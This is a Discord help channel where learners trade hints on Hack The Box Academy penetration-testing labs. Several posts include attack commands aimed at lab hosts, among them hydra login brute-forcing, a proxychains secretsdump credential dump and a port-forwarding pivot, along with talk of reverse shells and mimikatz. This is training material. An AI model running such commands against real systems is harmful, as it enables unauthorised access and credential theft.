#modules

1 messages Β· Page 91 of 1

misty current
#

I haven't done part 2 yet

urban anvil
#

can someone help me with Blind Data Exfiltration: Web Attacks

cursive zinc
#

Yes i have done it

real compass
#

Im actually going insane with this thing lol

misty current
#

Read the source code properly @real compass

surreal beacon
#

?

misty current
#

craft your hydra filter according to your source code, not using the one from examples in the module.

cursive zinc
#

Write to me in private

real compass
real compass
zinc marsh
#

i cannot find a way to privesc

uneven wyvern
#

hey guys I am new here to this server.....by chance can any1 of u guys teach me a few things abt hacking? (friday is my last day of exams so after that I will be free to learn)

analog dock
#

Still didn’t get it to work

misty current
#

then try to get a reverse shell directly instead

analog dock
#

Set up a listener but it never connected

misty current
#

can you show me the payload commands

#

msfvenom right?

analog dock
#

Yes

misty current
#

Yeah, there's a twist to that, when I was doing that module iirc

#

send me the command

analog dock
#

Ok

analog dock
naive field
#

im on AD enum and attacks assesment part 2, i've got password for CT059 but i can not connect to it for some reason

#

can someone dm me so i dont spoil anything here

#

i used the creds as answers on htb and it worked

#

but i can not connect to DC01 still

zinc marsh
#

i cannot find a way to privesc in the ms01

#

could u give me a hint

naive field
zinc marsh
#

assessment part 2

#

like 2 questions behind urs

#

Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

lyric bolt
#

does anyone have the issue with kali when it comes to using zip2john it hashes it as a $pkzip$ instead of $pkzip2$?

fathom pendant
#

Does it still decrypt ?

lyric bolt
#

it wont decrypt

#

as a work around i used the pwnbox zip2john

#

just wondering if anyone knows why the kali zip2john is different?

#

I prefer using my kali as much as possible so i would like to have a fix for this issue for the future.

fathom pendant
#

i didn't have issues with it Β―_(ツ)_/Β―

#

Is it telling you incorrect hash or is it running through and saying exhausted

lyric bolt
#

exhausted

sleek epoch
#

Anyone who has osint corporate meathod

fathom pendant
#

Then it's possible it's your wordlist not the hash

sleek epoch
#

Gota ask few things

lyric bolt
#

I thought that too

#

until i used the pwnbox's zip2john then moved that hash over to my kali

fathom pendant
lyric bolt
#

and cracked it with the same list i was getting exhausted on

fathom pendant
#

that's weird Β―_(ツ)_/Β―

lyric bolt
#

yeah ill keep researching it

sleek epoch
#

It's actually I wanted to know if the course or module is really good for that one particular topic?

fathom pendant
lyric bolt
#

could me a me issue

#

as in im doing something dumb

sleek epoch
#

I have another question

fathom pendant
sleek epoch
#

Related to web application pentesting

fathom pendant
#

just ask your question it's annoying just saying you have a question

lyric bolt
#

wasnt using either infront just ran
zip2john ZIP.zip > ZIP.hash

#

on the pwnbox it makes a hash of $pkzip2$
on the kali it makes a hash of $pkzip$

fathom pendant
#

weird Β―_(ツ)_/Β―

lyric bolt
#

yeah for sure

narrow solar
#

hey everyone, i am at Pass the Ticket (PtT) from Linux, i got the LINUX01$ Kerberos ticket file, but i am a little lost, do i have to use windows host to use it or i am supposed to crack it to have the hashes, i tried cracking it but cant crack the hash

fathom pendant
#

And the host you're on

narrow solar
#

it gives this 'kinit: Keytab contains no suitable keys for LINUX01@INLANEFREIGHT.HTB while getting initial credentials'

fathom pendant
#

Well maybe there's another one

#

They can expire you know πŸ˜‰

#

Perhaps the running service has a directory to look through

narrow solar
#

the hidden one?? but nothing there related to linux01πŸ˜…

fathom pendant
#

It might not directly say it. Remember, caches exist

zinc marsh
#

any hint for the Q8, i dont find anyway to get administrator in ms01

west night
#

@acoustic owl Regarding "What is the FQDN of the host where the last octet ends with "x.x.x.203"?" Am I on the right track with this command?
for sub in $(cat /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt);do dig any $sub.internal.inlanefreight.htb @10.129.100.209;done >> tryenum35.txt
When I use the command below:
cat tryenum35.txt | grep 203
I don't find FQDN, just the cookie id values.

#

Alternatively Am I on the right track with this command?
for sub in $(cat /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt);do dig axfr $sub.internal.inlanefreight.htb @10.129.100.209;done >> tryenum36.txt
in both cases I get a cookie value id that matches 203 but not the ip address. Thanks for your assistance.

fathom pendant
#

Also not sure what you're meaning by "cookie value?"

west night
#

COOKIE: d53f0f3067cf57c601000000648750a616cdfee5772034c3 (good)

fathom pendant
#

Try using the DNS tool showcased

fathom pendant
#

Not sure why you're using cookies

west night
#

that appeared when I grepped the result

fathom pendant
#

That's because it contains 203 in it

#

But it's not relevant

#

It's in the last 6 characters. Grep just checks for the match partially in the answer

#

Try against all subdomains in your base axfr to inlanefreight.htb

#

Also the brute force tool

#

They have

#

It's really good at giving you the answer

west night
#

@fathom pendant Thanks appreciate :). No worries I will bruteforce the inlanefreight.htb domain. Been stuck on this for about two weeks. I Can see the summit πŸ™‚
Did I understand you correctly?

fathom pendant
#

Sort of.
Step 1) identify all subdomains
Step 2) brute force them
Your answer will be in the format a.b.inlanefreight.htb

silk glade
#

Pls can someone help me "Attacking common services - Hard" lab last question?(DM me pls)

narrow solar
#

πŸ₯²

lilac python
#

"Edit the php.ini file to block system(), then try to execute PHP Code that uses system. Read the /var/log/apache2/error.log file and fill in the blank: system() has been disabled for ________ reasons. " , anyone can help ?

fathom pendant
thorn urchin
undone cypress
zinc marsh
#

someone could give me a hint please i have been stuck here all day

thorn urchin
#

its not a trick question

#

"do these things. Fill in the blank"

lilac python
#

It is just a word after one day thinking away from the point πŸ₯²

thorn urchin
lilac python
#

Security

thorn urchin
#

what

zinc marsh
#

i also know ||memberof||

acoustic owl
zinc marsh
#

just had to open powershell with administrator -.-

thorn urchin
#

sometimes it do be like that

acoustic owl
zinc marsh
#

u got it?

thorn urchin
zinc marsh
#

close to pass at least?

thorn urchin
#

Submitted my incomplete half assed 20 page report though. Gunna work on it while I wait for results though and the next step I can technically work on a little bit without exam access. So ill be ready on the second attempt to jump straight in for next stuff

thorn urchin
zinc marsh
#

well u have 1 month to prepare the 2nd attempt

#

and u know what u need to practice

thorn urchin
#

Really isnt about preparing too much. I just didnt have time

zinc marsh
#

ask for vacations for the exam

thorn urchin
#

Bro Im an american

misty current
#

Hope it was a good experience tho, you'll get it next try

zinc marsh
thorn urchin
#

A few, but at most I can take off like a day every couple months

#

I dont get paid time off

zinc marsh
#

oh

#

is different in europe then

thorn urchin
#

a week off work for the exam means I cant pay rent

zinc marsh
#

oh i thought u work in IT

thorn urchin
#

I do

zinc marsh
#

lol

#

i thought americans had crazy salaries in IT

thorn urchin
#

Depends on the job

#

my little corner slice of it is notoriously underpaid

#

junior pentester role will be almost double my current pay

#

getting a bit too offtopic though

zinc marsh
#

apply to jobs without the cpts

#

they will interview

thorn urchin
#

they have not

#

ill be fine I have a plan

misty current
zinc marsh
#

they wont ask to show the title

thorn urchin
#

no thanks

zinc marsh
#

well good luck for the next attempt πŸ™‚

rustic sage
#

i did that tho, worked out good

zinc marsh
rustic sage
#

i am a self learnd in pentesting, if you know how to pentest, mind hack your boss

#

Hey guys I wanna be hacker

#

I need to learn computer basics

compact patrolBOT
rustic sage
#

πŸ‘€

#

Bro is funny

#

indeed

#

So u don't tolerate hackers?

#

am one myself

#

I want to be one too

#

I can make money from this and it sounds cool asf

#

just start with the hack the box academy

#

and choose the penetrationtester course

#

penetration testing is a nicer word for hacker

#

How long is gonna take until I can offer my services to people

#

there isnt a time line

#

you need to do this everyday

#

and never stop learning

#

Bet ur doing this gorillon years

#

the important of all, you have to understand what you are doing, and what the cause can be on one of your decisions

rustic sage
#

and still learning everyday

#

How it all started for u bud

#

My English is still shit

#

cant say

#

whehere you from?

#

Bulgaria

#

far af

#

The fucking balkans

#

So idk a thing abt computers and tech

#

Do I have to read books

#

no

#

Fuck yeah

#

but you have to read alot for the theory

#

in htb example

zinc marsh
#

maybe some day

#

all depends on ur discipline

supple patio
#

Hi guys! Module: Attacking Common Services, Easy lab. Can't access the webshell idk why

misty current
#

understand the payload you've written for webshell.php.

supple patio
#

my head is going to burn now

#

)

misty current
#

The hint is, you are accessing your webshell. How does you code execute command

#

Where does it expect the parameters to be fed.

arctic pelican
#

@wild dragon need some help

supple patio
#

no idea

#

πŸ₯²

misty current
arctic pelican
#

Hi everyone i am stuck in Skills Assessment for Broken Authentication i think i have the account and i try all possible combination but same problem any hint " cant have requested role "

sweet lava
#

Hi, I'm stuck in Password Attacks- Pass the Ticket from Windows. I have done the first and second exercises, finding the number of users TGT and using john's tgt to perform a PTT attack via PS remoting. However, I can't find the second flag. The second question asks "Use John's TGT to perform a PTT attack and retrieve the flag from the shared folder. The only flag I see in the shared folder \DC01.inlanefreight.htb\john, the ||john.txt|| flag, but that is the answer to the third question and doesn't answer the 2nd question

opal storm
#

wow getting this password in the security assessment has me wanting to run my nails down a chalkboard lol, did anyone else find a way that didnt require port forwarding? i am able to remote into the machine but no commands get executed

pine dagger
#

You need to provide more context πŸ™‚

opal storm
pine dagger
#

Yus πŸ˜„

#

I guess I didn't provide enough context! πŸ˜„

opal storm
#

lol thats a good one

#

but im struggling with the first part of the security assessment in the active directory enumeration and attacks module, we need to get the password of the second user and i cant seem to find a way to do so

pine dagger
#

You mean the Skill Assessment? And Skill Asessment I? Which question?

opal storm
#

yes sorry

eternal zealot
#

Hi! I am very stuck on the lab password attacks medium. I can access to ssh with a user, and i get the doc with the documentation. I know that mysql is in localhost but i cant connect to it. Someone can give me a hint please?

#

Thanks so much!!

opal storm
supple patio
eternal zealot
#

"mysql -u root -p" but i tried a lot of commands. I try to connect with the user j* but i cant

#

I am looking for config files but i dont know if i am in the right way

pine dagger
supple patio
#

That helped me a lot

eternal zealot
eternal zealot
#

Thanks so much! It is night here now. Tomorrow I will continue testing. Thank you for offering your help. If I can't find it, I'll ask you for a hint

opal storm
eternal zealot
pine dagger
opal storm
pine dagger
opal storm
pine dagger
opal storm
steady hawk
zinc marsh
#

yo how is it going

opal storm
opal storm
zinc marsh
#

what module

opal storm
#

active directory enumeration and attacks - skills assessment p1 - q6

#

the same one ive been stuck on lol

zinc marsh
opal storm
#

thats what im trying to get still yes

zinc marsh
#

what do u have

opal storm
#

creds for the first user we need to obtain and access to the second machine

red current
#

Has anyone here made it through the Attacking Splunk section in Attacking Common Applications? I've tried following the lesson step by step, but there appears to be some missing info. Like where are certain scripts supposed to go? I've tried various combinations but every time I get the same error when I try to create the tarball. It gives me an error of directory or file not found.

#

It would help if there were more details in the section about how to modify the reverse_shell_splunk application and whether or not to leave the files there as they are or remove all the files and start from scratch. It seems to want you to do both wich is very confusing.

zinc marsh
opal storm
zinc marsh
opal storm
#

yes lol i can execute some commands on the second machine as that user

#

but i cant execute what we need in order to answer the question

#

nor can i get the right tools over

red current
#

Okay, I got the tarball to finally upload on the site but after doing so, I get no response on my listener. Has anyone else had this issue with the Attacking Splunk section? I have the shell pointing back to my VM with the correct IP and port number, but I get nothing back on my listener.

#

I'm really not sure what I'm doing wrong because the lesson is a bit ambiguous as to where the different scripts are supposed to go and how to edit the bin and default folders properly.

arctic pelican
#

@red current
Hi i am stuck in Skills Assessment for Broken Authentication i think i have the account and i try all possible combination but same problem any hint " cant have requested role " need some help

red current
arctic pelican
#

@red current it's okah thanks

opal storm
#

wow, i finally got in

#

but mimikatz doesnt like to behave lol through my session

pine dagger
#

Oh, were you trying to run it from the local machine?

#

the first one that is

opal storm
#

i was never able to get anything onto the second machine to get the password

#

sorry if im wording it poorly, im trying not to give away anything

pine dagger
#

Heh, its hard to explain thing and not put the answers in the channel πŸ˜„

real compass
#

Hey has anyone solved the second part of Skills Assessment Website on Login Brute Forcing as ive tried everything and still getting nowhere

pine dagger
opal storm
#

i tried so many different ways lol

red current
#

Okay, I started from scratch and reset the instance. I'm still running into the same issue with this section on Attacking Splunk. Does anyone know what I might be doing wrong here?

red current
real compass
#

Im just not sure what im doing wrong ive spent literally hours upon hours on it so far, I cracked the first bit and am on the admin portal now. Ive reused the username as stated in the hint and run it against rockyou for like an hour straight and it has accomplished nothing, nor has better default credentials i even tried a customised password list for the name "user" and its still done nothing.

red current
real compass
#

http-post-form β€œ/admin_login.php:user=^USER^&pass=^PASS^:F=<form name=’log-in’” I got this ending bit and i thought this was correct

#

cos i used inspect to get the form name and etc so like i customised it to what it should be i believ

red current
#

brb I'm having something to eat real quick.

real compass
#

ah okay all good mate

hard dew
#

anyone familiar with Java Script able to help me out with JavaScript Deobfuscation module

real compass
#

I tried using burpsuite and i cant see any alterations i should make as the information provided was identical to that found in my html inspection

hard dew
#

I'm pretty sure I found the flag in but posting to http://ip/keys.php but when I enter the flag it errors

red current
real compass
#

like with form name and the url ending and etc

red current
real compass
#

Okay, this is what i just ran
[ hydra -l user -P /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt -f -s 32607 178.62.18.68 http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='log-in'"]

#

ran this last night:
hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -u -f 165.232.102.252 -s 31517 http-post-form "/admin_login.php:name=user&password=^PASS^:F=<form name='log-in'"

red current
#

Try using rockyou.txt instead.

red current
#

Okay, that looks right to me. That should work.

real compass
#

It doesnt tho, it just runs indefinetly

#

i let it run for an hour yesterday and it turned no result

red current
#

Try using -t 4 to speed things up a bit.

real compass
#

yeah alright tysm ill keep you posted

red current
hard dew
#

anyone able to assist me with deobfuscating javascript?

#

^ this gives me a thing but not the traditional HTB{flag_goes_here}

#

also I was able to run the obfuscated xxx.js and get the code to run and give me the flag but it wont accept it

real compass
hard dew
#

^ thats where i'm entering the flag from running the obfuscated js but it errors

red current
real compass
#

yeah its been going for like 20 now

#

Any Idea what i should do cos nothing seems to be working

real compass
red current
real compass
#

Alrighty thanks

lyric bolt
calm fulcrum
#

Hey fokes,
I have a kdbx file of version 4. John or hashcat doesn't support extraction of hashes. Any suggestions?

calm fulcrum
#

Yep. It says it doesn't support version 4

hard dew
#

what about a keepass brute force script

#

looks like you can use keepass-cli to bruteforce the kdbx

calm fulcrum
#

Well looks like just the resource I needed. I'll give it a shot. Thankyou

hard dew
#

No prob

wild dragon
#

@arctic pelican hi friend, I sent you the guide for the SA of Broken Authentication module!
If you have any question, just text me!

acoustic owl
rapid sparrow
#

You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer.

#

Attacking Common Services - Easy ATTACKING COMMON SERVICES

#

Stuck with this

#

I am not sure how to crack the passwords, and I got this username

autumn pilot
#

focus on another service, e.g. the one you found the username

#

but there is a twist that you must not forget when attacking it

harsh patrol
#

What is the correct answer to the question "Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x)"? I tried all possibilities imo, but nothing works...

autumn pilot
#

from which section and module is that

misty current
#

I think it's from the Pivoting module

rustic sage
#

Hello, im in Password atack module Pass the ticket from windows i'm in the first activity and im trying to connect to rdp using this xfreerdp /u:Administrator /p:AnotherC0mpl3xP4$$ /v:10.129.214.47 but i have error, this are the credentials provided in the exercise, somebody know why is happen?

autumn pilot
#

put the password in single quotes

rustic sage
#

works!

analog dock
#

Frustrating module that is

#

I don’t like the wait lol

#

I’m at the password mutations now

autumn pilot
#

filter the wordlist to have only words starting with b/B

analog dock
#

Got it

#

Was already at the b’s

#

Was like a 15-20 min wait just to finish that part lol

harsh patrol
#

@slender shoal wanna DM regarding Attacking common services - hard? mybe i can give you some pointers

harsh patrol
fiery berry
autumn pilot
#

you can get the answer in two ways

#

one is literally somewhere in the section and the other is to replicate the things in the section

harsh patrol
#

I did, but the autoroute output seems to be wrong...

sleek urchin
#

I have finished Windows Privilege Escalation module expect for DnsAdmins section, despite I got to add my user to Domain Admins group I still have no access to the flag file. Neither have access to registry key. Do you have access to the flag file while for the registry key the permission is denied.

#

any help is well appreciated

autumn pilot
#

have you logged out and logged back in?

sleek urchin
#

yes I did, used gpupdate /force as well

#

but i only have disconnect from xfrerpd, no logout option

autumn pilot
#

use the windows one

#

e.g. once you have the rdp session -> windows button -> sign out

sleek urchin
harsh patrol
#

If you want Ctrl+Alt+Delete in RDP Session, you can use Ctrl+Alt+End

#

on Windows to Windows RDP, this gets executed on the remote host

narrow solar
#

hey everyone, i just want to ask is it possible to transfer files through port forwarding?? i tried it with scp but didnt work

#

"scp -P 2222 linikatz.sh julio@inlanefreight.htb@10.129.43.168:/home/julio@inlanefreight.htb"

acoustic owl
narrow solar
#

yes i get it, the pivot host at my example is configed to forward p 2222 to target 22 but scp doesnt work, it gives 'Permission denied, please try again' although ssh works fine

autumn pilot
#

you can try with using a simple method, setting up an http server on your machine and downloading the file you want on the target

#

since you can SSH into the 10.129.x.x subnet it means that you can communicate with it and vice versa

narrow solar
#

i think i tried it too and didnt work, let me try it again

harsh patrol
#

or use nc and cat to send and receive files over a custom port

narrow solar
autumn pilot
#

a port that is from your choosing

#

as long as you can reach your attack machine to the target you are ok

#

it has nothing to do with port forwarding and etc

narrow solar
#

so i can use my attack host ip at the victim host upload??

autumn pilot
#

try and you will see

narrow solar
#

realy appreciate your time πŸ₯°

#

πŸ˜‚ hope you some good time at it

#

I hope you to have good time at pivoting

harsh patrol
#

for all those struggling with pivoting: draw a network map on a piece of paper!

#

if you're not used to it or not into networking, it helps to get your head around it

#

πŸ˜‰

hollow totem
#

stuck on bypassing filter on Topology machine , anyone can help me get pass this

#

upp @everyone

sacred ermine
#

sup guys, any help in Documentation & Reporting skills assessment, I do not know where to move, I am stuck at first question, would appreciate if somn give me some direction on it, thanks

acoustic owl
sacred ermine
acoustic owl
rustic sage
#

some Cybersecurity training vendors limit how many times Metasploit can be used on lab exams. Here at Hack The Box, we encourage experimenting with tools in our lab environments until you have a solid foundational understanding.

#

HTB casually burning OffSec

#

Hello, im trying to do zip2john im using this zip2john Notes.zip > notes.hash and then im trying to crack it using this john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt notes.hash but i dont have result, somebody can help? I have this ded 1 password hash (PKZIP [32/64]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:00:00 DONE (2023-06-13 15:49) 0g/s 18625Kp/s 18625Kc/s 18625KC/s !joley08!..*7Β‘Vamos! Session completed

autumn pilot
#

use a different wordlist

#

you have already created one from a previous section

rustic sage
#

thanks

#

cryolite modules are too hard and i waste a loot of time

#

isnt better spend 4 hours with a password is stupid

#

you learn nothing

acoustic owl
quick cloud
#

yeah true that haha im hitting 5 hours with password attack hard

#

that its important to find right list

heady geyser
#

having trouble with the final question in Web Server Pivoting with Rpivot. i'm able to get a verified connection between my attack host and pivot host. i then use the proxychains firefox command but the website just hangs. i figured i would try it with pwnbox as well but the same issue happens. i was thinking about using the NTLM authentication command but i dont know what the ip of <ip address of proxy> would be. could use a nudge. thanks

rustic sage
#

Thanks man. This section is absolutely horrible. The article on Medium describes is way better.

heady tusk
heady geyser
#

hmmm, i never had it open to begin with. i'll try again. thanks

heady tusk
#

if you can't get it to work, feel free to dm. I can take a closer look

frigid stump
kind fern
#

I need a hint for Attacking Common Services - Hard, the question is "What file can you retrieve that belongs to the user "simon"? (Format: filename.txt)"

high hearth
#

I'm new here on this platform. The "find" command may be of help

heady tusk
kind fern
heady tusk
#

go through the available services, think about where you could find files and grab them from there

kind fern
heady tusk
#

all you need is smbclient

kind fern
plain sleet
#

anyone did the advanced SQL injections skill assessment? have managed to get the unauth sqli but i have some issues with getting the login

sacred ermine
#

@acoustic owl

sorry for bothering you, but digging after an hour I even got nothing, I actually got the password for administrator in smb shares, but it is not working

acoustic owl
kind fern
kind fern
sacred ermine
heady tusk
sacred ermine
foggy light
#

Module: Kerberos Attacks
Section: Unconstrained Delegation - Computers
Question: Compromise the Domain and read the content of \DC01\C$\Unconstrained\flag.txt
I used printer bug to get TGT and then used mimikatz to dump ntlm hash of brian.willis. But I cant access c$

acoustic owl
acoustic owl
modern falcon
#

Module: Pivoting, Tunneling, and port forwarding
Section: web server pivoting with rpivot
I need help with the last question. I have run server.py on the attack host, and run the client.py on the pivot host, but i still cannot connect to 172 16.5 135 via proxychains

heady tusk
#

did you have firefox open while attempting to run it through proxychains?

modern falcon
#

Yes, i run proxychains firefox-esp 172.16.5.135:80. Firefox opens but cannot load the page

heady tusk
#

if firefox is open when you run that command, it won't work. close down firefox, then try again

modern falcon
#

I see. Thanks a lot

foggy light
plain sleet
#

did you managed to resolve this?

acoustic owl
left pond
#

can someone help me with windows fundamentals? i cant access any smb share, i just get timeout, rechecked the vm on site and vpn everything is up
i also checked smbclient on my vm and it works perfectly

#

ok imma reset the target, maybe it will help

pine dagger
plain sleet
left pond
pine dagger
# plain sleet can i dm you for this?

In about 30 minutes once the painkillers and caffiene kick in. But in meantime, make sure you don't use JD-GUI. Use fernflower. JD-GUI screws up the decompilation.

plain sleet
pine dagger
sacred ermine
#

@acoustic owl I really run out of ideas, PowerView works neither, I cannot even read desription fields like idk

plain sleet
pine dagger
sacred ermine
#

anyone can help with skills assessment? I stuck on the first question

foggy light
#

haha.. this module channel is warroom I swear. Massive respect for the community people who are helping everyone pretty much for free

pine dagger
#

The AD Enumeration module is particularly a brutal module

#

Its one of the modules that everyone seems to get stuck on, and since its a T2 module, its more accessible than some of the comparably hard ones, such as Adv. SQl injection, HTTP attacks, etc.

plain sleet
pine dagger
#

The ||black list filtering works on pieces of words, not just whole words. Look at the filter for a word that might be inside the word password|| πŸ™‚

misty current
#

So, on completing the skill assessment 2 for Windows PE. I PE'd the machine and I added my user to the local administrators group. I ran mimikatz to dump the system sam/lsa but I couldn't (I even tried again after loggin out and in). But, I ran it smooth in the Administrator account which dumped me the sam.

#

does it got to do with the UACs?

oblique bridge
#

hi

unique coral
#

Hi, anyone faced credentials issue while RDP to the target machine?

#

wrong credentials, which were already mentioned in the wuestions part of the module

heady tusk
#

which command did you use?

blazing onyx
#

Hey all, can't connect to starting point machine, anyone else have a similar issue?

unique coral
#

simple rdp into windows machine from windows

autumn pilot
#

try putting the password in single quotes

unique coral
#

in LLMNR/NBT-NS Poisoning - from Windows module

unique coral
heady tusk
blazing onyx
#

it says I dont have access to that?

heady tusk
blazing onyx
#

ty

heady tusk
#

np πŸ™‚

blazing onyx
#

what was the channel u originally linked that I should go to?

#

sorry I can't see it

autumn pilot
blazing onyx
#

ty!

unique coral
#

normally RDP from windows machine to a target windows machine

autumn pilot
#

well, unless you provide the command (syntax) we can't help you much

unique coral
#

no worries man, even I am unable to upload the image here

autumn pilot
#

you can copy and paste the command

unique coral
#

man, in windows gui is there for RDP

autumn pilot
misty current
#

can you type the username alone here

#

mask it, if it's sensitive.

misty current
unique coral
misty current
#

alright, what error do you get when you RDP?

#

wrong credentials?

unique coral
#

yes

autumn pilot
#

you can use xfreerdp through teh workstation

unique coral
#

anyone faced this issue before?

autumn pilot
#

not sure why you are trying to use your main pc to connect?

unique coral
#

earlier machines worked fine, only this one is giving me error

misty current
#

I believe xfreerdp automatically does the domain prepend for you, try the username with DOMAIN\username

unique coral
#

this module

autumn pilot
#

addiotionally, it is not recommended to use your main pc with the vpn

unique coral
#

yes but username is htb-student only

#

submitted a ticket to the htb academy support, waiting for them to respond

misty current
#

INLANEFREIGHT\htb-student did you try this?

autumn pilot
#

use the provided workstation or a vm

#

the credentials are working, I've just tested

unique coral
#

with this INLANEFREIGHT\htb-student username

misty current
#

it's a domain user, so you need to prepend the domain name or it'll consider it as local login (This is for the windows RDP client)
When you do it through xfreerdp, it automatically does it for you

unique coral
#

ohhky, got it, thanks man

#

@autumn pilot man, so would I use linux vm or the vm which is there on htb academy?

#

which one is recommended?

autumn pilot
#

whichever makes you more comfortable

unique coral
#

local vm would be fine then, thanks man @autumn pilot

naive field
#

hi i've got a machine "error" to say, can i dm a moderator please? thanks.

#

its supposed to work but its not working πŸ€·β€β™‚οΈ :/

#

i alr texted people that have done it and they said it should work

#

im trying to use powerview function but its not working, i import powerview

#

imported*

rustic sage
#

hello

rustic sage
# rustic sage hello

is introduction to network module is enough or i should take CCNA or N+ to understand the network terminolgies which was in labs and pentester job path?

timber ore
#

I am in the AD Enumeration & Attacks - Skills Assessment Part I

Last question of the assessment

"Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01"

I got the clear text creds of|| t*|| my proxychain command fails.

DC IP : 172.16.6.3 (DC01)
Webserver IP : 10.129.202.242,172.16.5.100

I ran this on webserver: netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.202.242 connectport=445connectaddress=172.16.6.3

in proxychains.conf i commented out the socks4 127.0.0.1 9050
and added socks5 10.129.202.242 8080

And when i ran this command proxychains secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/tpetty@172.16.6.3 -use-vss
I get this error:

[proxychains] Strict chain ... 10.129.202.242:8080 ... 172.16.6.3:445 <--socket error or timeout!
[-] RemoteOperations failed: [Errno Connection error (172.16.6.3:445)] [Errno 111] Connection refused
[] Cleaning up...*

Can anyone help me with am i missing or doing wrong?
Thanks

naive field
analog dock
#

Not being able to extend an instance might be the most annoying thing ever

leaden quail
#

got serveral errors...

timber ore
#

@acoustic owl Can you please take a look at my question. Thanks

naive field
#

so i really dont know what else can be the problem

#

i also restared the machine

#

and tried but same stuff again

timber ore
naive field
#

i did man

#

it just says check if powerview path is good

#

and it is lol

timber ore
#

lol

#

which section is it?

naive field
#

last part

timber ore
#

oh! you are ahead of me

#

can you help me with my question

timber ore
#

No need to go for CCNA or N+ if you understand the common concepts related Networking

#

CCNA is a very separated course, I am certified CCNP and i never needed it, it was just a waste of time

rustic sage
timber ore
#

I believe so

rustic sage
#

ok thanks

obsidian sundial
#

how to i completely clear my kali linux space and reset it to new

naive field
azure verge
#

Something weird is happening with my VPN connection on HTB academy. I am on eu-academy-1 server and I'm not able to make any requests on port 80 (and possibly 443) on any of the targets when connected via VPN. I can access them from the in-browser VM. Is anyone else facing this issue?

obsidian sundial
#

guys i really need help how do i delete kali

#

i want to delete all of my storage in kali and make it new

#

somebody help

#

please

acoustic owl
naive field
rustic arrow
#

anyone has any tip for going faster on password cracking network services? it's taking forever

[DATA] max 4 tasks per 1 server, overall 4 tasks, 94044 login tries (l:1/p:94044), ~23511 tries per task
[DATA] attacking ssh://<ip>:22/
[STATUS] 41.00 tries/min, 41 tries in 00:01h, 94003 to do in 38:13h, 4 active

I'm using pwnbox to decrease the network lag already

analog dock
#

I can’t seem to figure out how to mount the backup vhd in the password attack hard labs πŸ˜“

obsidian sundial
#

how to i reset my kali and delete everything to make it like new

heady tusk
heady tusk
obsidian sundial
#

guys how do i reset my kali linuc

#

*linux

harsh patrol
obsidian sundial
#

how

harsh patrol
naive field
#

man this is bullsh*t

#

its not woring

#

working for no reason

acoustic owl
naive field
#

i even downloaded the latest powerview and transfered it from my host to ssh then from ssh to machine host

#

same bs

rustic arrow
naive field
naive field
acoustic owl
heady tusk
rustic arrow
heady tusk
heady tusk
autumn pilot
analog dock
#

Absolute horrendous lab

acoustic owl
rustic arrow
rustic arrow
heady tusk
analog dock
#

Is it even possible to use gparted in pwnbox?

#

Just closes instantly for me

acoustic owl
heady tusk
#

true I guess, but it's just too much going on usually

foggy light
#

Huge +rep for @acoustic owl... bro being the community hero. Literally helped with my CPTS path

rustic arrow
#

44 tries in 00:01h, 21068 to do in 07:59h, 4 active lol cool, I hope I wont need bruteforce too many times in cpts

analog dock
analog dock
#

Been stuck trying to do it for 4 hours now

acoustic owl
analog dock
#

Neither works

sweet lava
#

I am having this same exact problem right now. Any tips?

acoustic owl
#

i did it in my vm

sudo apt-get update; sudo apt-get install dislocker -y
sudo mkdir -p /media/bitlocker
sudo mkdir -p /media/bitlockermount
sudo losetup -f -P Backup.vhd
sudo dislocker /dev/loop0p2 -uPASSWORDHERE -- /media/bitlocker
sudo mount -o loop /media/bitlocker/dislocker-file /media/bitlockermount
analog dock
#

No dice

#

The only partitions that show are sda1 and 2 and neither works

heady tusk
sweet lava
#

It's weird, it's like that other ticket just doesn't exist. I see it there when I list hidden files, but I can't operate with it or even copy it

heady tusk
#

I'll get to this in a few minutes. don't worry, didn't forget you

sweet lava
heady tusk
#

ooof xD
Well glad you got it πŸ˜„

analog dock
#

This lab is starting to piss me off now

fathom pendant
analog dock
#

Literally spent more time mounting that damn thing than doing all of the module

sweet lava
#

I'm having a ton of issues with Password Attacks - Pass The Ticket from Linux - "Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01" question if anybody here gets the chance. Not really even sure where to start here.

fathom pendant
#

That directory can be useful

sweet lava
fathom pendant
sweet lava
fathom pendant
zinc marsh
#

linux is too complicated

proud pine
heady tusk
#

same

#

though if anyone knows a linux way I'd love to add that to my notes πŸ˜„

heady tusk
#

ah true I forgot lol

#

thanks for the reminder

zinc marsh
#

it never worked for me but well lol

analog dock
heady tusk
#

shared folder between kali vm and windows host for me

cyan ginkgo
#

so in the upload skill assessment i found a way to svg read source code but i cant seem to find the path to /upload.php

sweet lava
heady tusk
zinc marsh
#

and mounted it

zinc marsh
heady tusk
#

lol

#

that's about as dumb as me copying commands between host and VM via shared folder cause my copy paste is broken and I can't find a way to fix it lol

spiral scaffold
#

Hello all.

I had a question about the src code of a metasploit exploit used in one of the modules:
https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb

if I understand this correctly, I believe it is making a GET request to this url:
GET /wp-admin/tools.php?page=backup_manager&download_backup_file=../../../../../../etc/passwd HTTP/1.1

I was curious about the need for line 53 since I was able to perform directory traversal without including that particular query.
I used this instead:
/wp-admin/tools.php?download_backup_file=../../../../../../etc/passwd HTTP/1.1

Thanks!

heady tusk
heady tusk
spiral scaffold
heady tusk
#

sure thing πŸ™‚

analog dock
proud pine
analog dock
#

I used this way

proud pine
#

switch to binary mode?

analog dock
#

But the md5sum is incorrect yeah

thorn urchin
#

Hi david

analog dock
thorn urchin
analog dock
#

Got itπŸ‘πŸΌ

thorn urchin
#

I was stubborn and just googled hard about how to mount it in linux

limber veldt
#

Guys i need help
